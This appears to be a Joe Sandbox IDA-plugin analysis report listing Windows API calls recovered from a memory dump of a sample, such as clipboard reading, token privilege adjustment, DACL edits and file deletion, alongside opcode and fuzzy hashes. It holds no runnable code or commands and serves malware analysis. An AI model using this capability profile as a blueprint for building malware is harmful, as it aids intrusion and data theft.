                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: __wsopen_s
                                                                  • String ID:
                                                                  • API String ID: 3347428461-0
                                                                  • Opcode ID: 6092b62987b5d8484cf191d68298a622defd6d453ea85a893a351e15b7511341
                                                                  • Instruction ID: 63538995500c5b66e6139e0f9f38ed3620f13d9608b796ab6d6de45e7de474ca
                                                                  • Opcode Fuzzy Hash: 6092b62987b5d8484cf191d68298a622defd6d453ea85a893a351e15b7511341
                                                                  • Instruction Fuzzy Hash: 0C11187590410AEFCB05DF58E9459DE7BF5EF48310F114069FC09AB311DA31EA15CBA5
                                                                  APIs
                                                                    • Part of subcall function 00654FF0: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,0065319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00655031
                                                                  • _free.LIBCMT ref: 006553DF
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                   • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: AllocateHeap_free
                                                                  • String ID:
                                                                  • API String ID: 614378929-0
                                                                  • Opcode ID: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
                                                                  • Instruction ID: 974e537aef5857fbb36c18d096b2d52cc4fb212f75ddc86e4bb82ec723ba57c1
                                                                  • Opcode Fuzzy Hash: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
                                                                  • Instruction Fuzzy Hash: 19014E721003056BE3318F59D84595AFBEEFB853B1F25052DE98583280FB706809C774
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                   • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                  • Instruction ID: e970a5c2ba4d4c27fc9d8fc6100f5b7b52c2a96daff2ba33b34162879ce5143e
                                                                  • Opcode Fuzzy Hash: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                  • Instruction Fuzzy Hash: FDF02D325016105AD7F13A2ADC05B9A339BAF42335F10071DFC21932D1EB71D80686DA
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                   • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: _wcslen
                                                                  • String ID:
                                                                  • API String ID: 176396367-0
                                                                  • Opcode ID: faa0466afaf17761815a6b850a0c79bb991deb5b4a71d50c1dda8d7f1d7fb8b2
                                                                  • Instruction ID: c7eec60b95548971111d11b1901145e0871daf318707b605f8f0a632df399775
                                                                  • Opcode Fuzzy Hash: faa0466afaf17761815a6b850a0c79bb991deb5b4a71d50c1dda8d7f1d7fb8b2
                                                                  • Instruction Fuzzy Hash: FDF0A4B26016146ED7549F28D806FA6BB99EB44360F10812EFA19CB2D1DB31E5108AA4
                                                                  APIs
                                                                  • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 0069F987
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                   • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: EnvironmentVariable
                                                                  • String ID:
                                                                  • API String ID: 1431749950-0
                                                                  • Opcode ID: d8326e7576ad4e08f9d7014645bac2fb89bd406a314fda9501d2d49941ac47eb
                                                                  • Instruction ID: 0bb51f3ac0f8c51afdaa7dae634f01ba1e616765ecabe0d335077c3605ad7330
                                                                  • Opcode Fuzzy Hash: d8326e7576ad4e08f9d7014645bac2fb89bd406a314fda9501d2d49941ac47eb
                                                                  • Instruction Fuzzy Hash: 06F08172600114BFDB40EBA5DC46D9E7BBEEF49710F000058F6059B261DA70AA40CB54
                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,0065319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00655031
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                   • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: AllocateHeap
                                                                  • String ID:
                                                                  • API String ID: 1279760036-0
                                                                  • Opcode ID: d726ab8a4a917254fe23e37e7cda1dbc1c53e05a1f73821dce61b28b3cb8970c
                                                                  • Instruction ID: 13a1569917ccb051d4cdc72520991af66e852a93160c31209704ca2a914845b5
                                                                  • Opcode Fuzzy Hash: d726ab8a4a917254fe23e37e7cda1dbc1c53e05a1f73821dce61b28b3cb8970c
                                                                  • Instruction Fuzzy Hash: A3F0E932510E20A7DB315F26DC29F9B374BAF407E1F154022BC069B2D0EA70D80A86E0
                                                                  APIs
                                                                  • RtlAllocateHeap.NTDLL(00000000,?,?,?,00646A79,?,0000015D,?,?,?,?,006485B0,000000FF,00000000,?,?), ref: 00653BC5
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                   • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: AllocateHeap
                                                                  • String ID:
                                                                  • API String ID: 1279760036-0
                                                                  • Opcode ID: 64e880acabd64abfb096e5b5867691bdeab25fe5afc4b65e55a9e542e2201811
                                                                  • Instruction ID: ebacc752a78cba9c6783c16f98bd8a76a0e589ee26c18e3cb022a0a173c2c612
                                                                  • Opcode Fuzzy Hash: 64e880acabd64abfb096e5b5867691bdeab25fe5afc4b65e55a9e542e2201811
                                                                  • Instruction Fuzzy Hash: DAE0ED21200630A7DB612A769C01B9B3B4FAF21BE2F150525EC059A391DB70CE4885A4
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                   • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5ffaf1d4c9fae17bdd406c87646e9dd853bca2f7fb96acb9c5f3610ebd3f57dc
                                                                  • Instruction ID: 6af99157fdf9baed3311599b0508952e69c6f4795f75b67adbee401d13db1b91
                                                                  • Opcode Fuzzy Hash: 5ffaf1d4c9fae17bdd406c87646e9dd853bca2f7fb96acb9c5f3610ebd3f57dc
                                                                  • Instruction Fuzzy Hash: 09F06DB1105B22CFCB349F64E8A0856BBF6BF143293248A3EF5D786620C7729880DF50
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                   • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ClearVariant
                                                                  • String ID:
                                                                  • API String ID: 1473721057-0
                                                                  • Opcode ID: e3f0b0a743a70650880ab84259fab9f1056fb543a197d2ab9677f1d0305cc1dc
                                                                  • Instruction ID: 19629249646f494b8d7ad8007f4f30fdce2792a9be1991a1c454da208fd10065
                                                                  • Opcode Fuzzy Hash: e3f0b0a743a70650880ab84259fab9f1056fb543a197d2ab9677f1d0305cc1dc
                                                                  • Instruction Fuzzy Hash: FEF0E5B1708601AAE7304BA4D8057E1F7EAAB01315F10851EF4D9C7281D7B244D49B91
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                   • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: __fread_nolock
                                                                  • String ID:
                                                                  • API String ID: 2638373210-0
                                                                  • Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                  • Instruction ID: ede9d3d98add757d1136287f476a948a4c94d02e438c67379d25b279ca73080d
                                                                  • Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                  • Instruction Fuzzy Hash: 27F0F87550020DFFDF05DF90C941E9E7B7AFB04318F208449F9159A251C336EA21ABA1
                                                                  APIs
                                                                  • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00623963
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                   • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: IconNotifyShell_
                                                                  • String ID:
                                                                  • API String ID: 1144537725-0
                                                                  • Opcode ID: 50575a14439c40fef608a4fc804ac38b27d421797ca1f72a61e447a68f35e3f3
                                                                  • Instruction ID: f27b34744c2519d24c72b56436c33c1abc662ece948b6b1fc42bc9a3e7e50917
                                                                  • Opcode Fuzzy Hash: 50575a14439c40fef608a4fc804ac38b27d421797ca1f72a61e447a68f35e3f3
                                                                  • Instruction Fuzzy Hash: 00F037B19143199FE752DF24DC45BD57FFDA701708F0011A9A64496281D7745B88CF91
                                                                  APIs
                                                                  • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00623A76
                                                                    • Part of subcall function 00628577: _wcslen.LIBCMT ref: 0062858A
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                   • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: LongNamePath_wcslen
                                                                  • String ID:
                                                                  • API String ID: 541455249-0
                                                                  • Opcode ID: e337a212b95b93cf9f7179c79226f412953994e0fbebe2872b5ce87760634d21
                                                                  • Instruction ID: d66199b68f31a300cfcfada34435d44c8b30582e23506b2b29b7d08911c763e1
                                                                  • Opcode Fuzzy Hash: e337a212b95b93cf9f7179c79226f412953994e0fbebe2872b5ce87760634d21
                                                                  • Instruction Fuzzy Hash: FAE0CD769001245BC75092589C05FDA77DEDFC8790F044175FD05D7254D970DEC08594
                                                                  APIs
                                                                  • CreateFileW.KERNEL32(00000000,00000000,?,00660A84,?,?,00000000,?,00660A84,00000000,0000000C), ref: 00660737
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                   • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFile
                                                                  • String ID:
                                                                  APIs
                                                                  • GetFileAttributesW.KERNEL32(?,0068D840), ref: 0068EAB1
                                                                  Similarity
                                                                  • API ID: AttributesFile
                                                                  • String ID:
                                                                  APIs
                                                                    • Part of subcall function 0068DC54: FindFirstFileW.KERNEL32(?,?), ref: 0068DCCB
                                                                    • Part of subcall function 0068DC54: DeleteFileW.KERNEL32(?,?,?,?), ref: 0068DD1B
                                                                    • Part of subcall function 0068DC54: FindNextFileW.KERNELBASE(00000000,00000010), ref: 0068DD2C
                                                                    • Part of subcall function 0068DC54: FindClose.KERNEL32(00000000), ref: 0068DD43
                                                                  • GetLastError.KERNEL32 ref: 0069666E
                                                                  Similarity
                                                                  • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                  • String ID:
                                                                  APIs
                                                                    • Part of subcall function 00682010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0068205A
                                                                    • Part of subcall function 00682010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00682087
                                                                    • Part of subcall function 00682010: GetLastError.KERNEL32 ref: 00682097
                                                                  • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00681BD2
                                                                  • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00681BF4
                                                                  • CloseHandle.KERNEL32(?), ref: 00681C05
                                                                  • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00681C1D
                                                                  • GetProcessWindowStation.USER32 ref: 00681C36
                                                                  • SetProcessWindowStation.USER32(00000000), ref: 00681C40
                                                                  • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00681C5C
                                                                    • Part of subcall function 00681A0B: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00681B48), ref: 00681A20
                                                                    • Part of subcall function 00681A0B: CloseHandle.KERNEL32(?,?,00681B48), ref: 00681A35
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                  • String ID: $default$winsta0$jn
                                                                  APIs
                                                                    • Part of subcall function 00681A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00681A60
                                                                    • Part of subcall function 00681A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,006814E7,?,?,?), ref: 00681A6C
                                                                    • Part of subcall function 00681A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,006814E7,?,?,?), ref: 00681A7B
                                                                    • Part of subcall function 00681A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,006814E7,?,?,?), ref: 00681A82
                                                                    • Part of subcall function 00681A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00681A99
                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00681518
                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0068154C
                                                                  • GetLengthSid.ADVAPI32(?), ref: 00681563
                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 0068159D
                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 006815B9
                                                                  • GetLengthSid.ADVAPI32(?), ref: 006815D0
                                                                  • GetProcessHeap.KERNEL32(00000008,00000008), ref: 006815D8
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 006815DF
                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00681600
                                                                  • CopySid.ADVAPI32(00000000), ref: 00681607
                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00681636
                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00681658
                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0068166A
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00681691
                                                                  • HeapFree.KERNEL32(00000000), ref: 00681698
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 006816A1
                                                                  • HeapFree.KERNEL32(00000000), ref: 006816A8
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 006816B1
                                                                  • HeapFree.KERNEL32(00000000), ref: 006816B8
                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 006816C4
                                                                  • HeapFree.KERNEL32(00000000), ref: 006816CB
                                                                    • Part of subcall function 00681ADF: GetProcessHeap.KERNEL32(00000008,006814FD,?,00000000,?,006814FD,?), ref: 00681AED
                                                                    • Part of subcall function 00681ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,006814FD,?), ref: 00681AF4
                                                                    • Part of subcall function 00681ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,006814FD,?), ref: 00681B03
                                                                  Similarity
                                                                  • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                  • String ID:
                                                                  APIs
                                                                  • OpenClipboard.USER32(006BDCD0), ref: 0069F586
                                                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 0069F594
                                                                  • GetClipboardData.USER32(0000000D), ref: 0069F5A0
                                                                  • CloseClipboard.USER32 ref: 0069F5AC
                                                                  • GlobalLock.KERNEL32(00000000), ref: 0069F5E4
                                                                  • CloseClipboard.USER32 ref: 0069F5EE
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0069F619
                                                                  • IsClipboardFormatAvailable.USER32(00000001), ref: 0069F626
                                                                  • GetClipboardData.USER32(00000001), ref: 0069F62E
                                                                  • GlobalLock.KERNEL32(00000000), ref: 0069F63F
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0069F67F
                                                                  • IsClipboardFormatAvailable.USER32(0000000F), ref: 0069F695
                                                                  • GetClipboardData.USER32(0000000F), ref: 0069F6A1
                                                                  • GlobalLock.KERNEL32(00000000), ref: 0069F6B2
                                                                  • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0069F6D4
                                                                  • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0069F6F1
                                                                  • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0069F72F
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0069F750
                                                                  • CountClipboardFormats.USER32 ref: 0069F771
                                                                  • CloseClipboard.USER32 ref: 0069F7B6
                                                                  Similarity
                                                                  • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                  • String ID:
                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00697403
                                                                  • FindClose.KERNEL32(00000000), ref: 00697457
                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00697493
                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 006974BA
                                                                    • Part of subcall function 0062B329: _wcslen.LIBCMT ref: 0062B333
                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 006974F7
                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00697524
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                  • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0069A0A8
                                                                  • GetFileAttributesW.KERNEL32(?), ref: 0069A0E6
                                                                  • SetFileAttributesW.KERNEL32(?,?), ref: 0069A100
                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0069A118
                                                                  • FindClose.KERNEL32(00000000), ref: 0069A123
                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 0069A13F
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0069A18F
                                                                  • SetCurrentDirectoryW.KERNEL32(006E7B94), ref: 0069A1AD
                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 0069A1B7
                                                                  • FindClose.KERNEL32(00000000), ref: 0069A1C4
                                                                  • FindClose.KERNEL32(00000000), ref: 0069A1D4
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                  • String ID: *.*
                                                                  APIs
                                                                  • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00694785
                                                                  • _wcslen.LIBCMT ref: 006947B2
                                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 006947E2
                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00694803
                                                                  • RemoveDirectoryW.KERNEL32(?), ref: 00694813
                                                                  • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0069489A
                                                                  • CloseHandle.KERNEL32(00000000), ref: 006948A5
                                                                  • CloseHandle.KERNEL32(00000000), ref: 006948B0
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                  • String ID: :$\$\??\%s
                                                                  • API String ID: 1149970189-3457252023
                                                                  • Opcode ID: e36bb55bda7ac7b254786c9edbf28ca3e53a55c1901bccc5e373e075f6b78618
                                                                  • Instruction ID: 8fd2a3618e81223748278615093187fd14f5619fc9f924b23987120d4e7f2b4a
                                                                  • Opcode Fuzzy Hash: e36bb55bda7ac7b254786c9edbf28ca3e53a55c1901bccc5e373e075f6b78618
                                                                  • Instruction Fuzzy Hash: 993193B150414AABDF209BA0DC45FEB37BEEF89704F1041B6F619D6161EB7096858B24
                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0069A203
                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0069A25E
                                                                  • FindClose.KERNEL32(00000000), ref: 0069A269
                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 0069A285
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0069A2D5
                                                                  • SetCurrentDirectoryW.KERNEL32(006E7B94), ref: 0069A2F3
                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 0069A2FD
                                                                  • FindClose.KERNEL32(00000000), ref: 0069A30A
                                                                  • FindClose.KERNEL32(00000000), ref: 0069A31A
                                                                    • Part of subcall function 0068E399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0068E3B4
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                   • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                   • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                  • String ID: *.*
                                                                  • API String ID: 2640511053-438819550
                                                                  • Opcode ID: 07b82849b9a989cb93c13bc616b3f9b11a5e61cceabbd97a02445724541294e9
